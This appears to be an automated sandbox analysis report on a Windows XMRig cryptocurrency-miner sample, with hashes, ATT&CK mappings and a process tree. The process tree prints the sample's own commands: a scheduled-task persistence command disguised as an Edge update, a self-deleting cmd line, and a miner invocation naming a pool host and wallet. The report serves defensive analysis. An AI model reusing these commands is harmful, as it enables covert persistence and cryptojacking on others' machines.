xmrig | e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96b

Analysis

max time kernel
120s
max time network
115s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2025 15:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe
Size

1.8MB
MD5

87afdc6e4189d9c282dc2cef16489b20
SHA1

12adfc719b99ca188efee3ba9cd9738ed35efcd3
SHA256

e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96b
SHA512

d1f90bf060b8cf8e9d902e53158e63a03a6e613a3247312fb7d891d5695ab4047115f7bd11709b253b89ecd4f9224e3558172caaf910fd68a5b65641932df06f
SSDEEP

49152:v1NgdUZonOk+9wqzOCN6OEOIUlNIiOkk6baID2rd0f:d6KkBCk6zlNIG95yWf

Score

10^/10

xmrig miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral2/memory/1404-23-0x00007FF7EFF70000-0x00007FF7F075C000-memory.dmp	xmrig

Downloads MZ/PE file 1 IoCs

flow	pid	Process
37	5052	Updater.exe

Executes dropped EXE 2 IoCs

pid	Process
5052	Updater.exe
1404	UpdateTaskManager.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2876	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3504	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe
5052	Updater.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1404	UpdateTaskManager.exe
Token: SeLockMemoryPrivilege	1404	UpdateTaskManager.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1404	UpdateTaskManager.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 432 wrote to memory of 3504	432	e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe	82
PID 432 wrote to memory of 3504	432	e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe	82
PID 432 wrote to memory of 4780	432	e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe	83
PID 432 wrote to memory of 4780	432	e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe	83
PID 4780 wrote to memory of 2876	4780	cmd.exe	86
PID 4780 wrote to memory of 2876	4780	cmd.exe	86
PID 5052 wrote to memory of 1404	5052	Updater.exe	97
PID 5052 wrote to memory of 1404	5052	Updater.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe
"C:\Users\Admin\AppData\Local\Temp\e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:432
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\Updater.exe" /RL HIGHEST /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3504
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\Admin\AppData\Local\Temp\e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96bN.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Windows\system32\timeout.exe
    timeout /t 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2876

C:\ProgramData\WinUpdate32\Updater.exe
C:\ProgramData\WinUpdate32\Updater.exe
1⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5052
- C:\Users\Admin\AppData\Roaming\Microsoft\UpdateTaskManager.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\UpdateTaskManager.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 48EzR9SzuqGf2S1gXVTkpEDrEhZ6WpJX3KKsG6ZxMi447nkY7LQeN4p7Ye13tkw7G3KGDKp5Q3C47ZUsQpsSXzA27tT3z82.WORKER1 -p WORKER1 --threads=4 --cpu-priority=0 --tls
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WinUpdate32\Updater.exe

Filesize
1.8MB

MD5
87afdc6e4189d9c282dc2cef16489b20

SHA1
12adfc719b99ca188efee3ba9cd9738ed35efcd3

SHA256
e62f10e317a9ff713ced832003a3ddc6ed586c742a929e745cbbf5ebfcd6a96b

SHA512
d1f90bf060b8cf8e9d902e53158e63a03a6e613a3247312fb7d891d5695ab4047115f7bd11709b253b89ecd4f9224e3558172caaf910fd68a5b65641932df06f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UpdateTaskManager.exe

Filesize
5.3MB

MD5
0b6c036c7e331ac1580b1c6e8b89e92f

SHA1
c2e43e4ed7322aea501c58030eabb9c358afa5db

SHA256
91bb6ef6bb9a99d6120ba4ce41712764874476af7c1c49d087940a972078ac08

SHA512
72cf27688da48b95fe51e9dfdee985821e344c87144932010b143eb377c7eb3823610be3cac95c9984fbf0d7598da6f6d7a1ce02b046c34081478b726fdfe5fc

Download Submit
memory/432-0-0x0000000140000000-0x00000001401C8000-memory.dmp

Filesize
1.8MB

Download
memory/1404-10-0x00007FF7EFF70000-0x00007FF7F075C000-memory.dmp

Filesize
7.9MB

Download
memory/1404-17-0x000001578E870000-0x000001578E913000-memory.dmp

Filesize
652KB

Download
memory/1404-21-0x000001578CF90000-0x000001578CFB0000-memory.dmp

Filesize
128KB

Download
memory/1404-23-0x00007FF7EFF70000-0x00007FF7F075C000-memory.dmp

Filesize
7.9MB

Download
memory/5052-3-0x0000000140000000-0x00000001401C8000-memory.dmp

Filesize
1.8MB

Download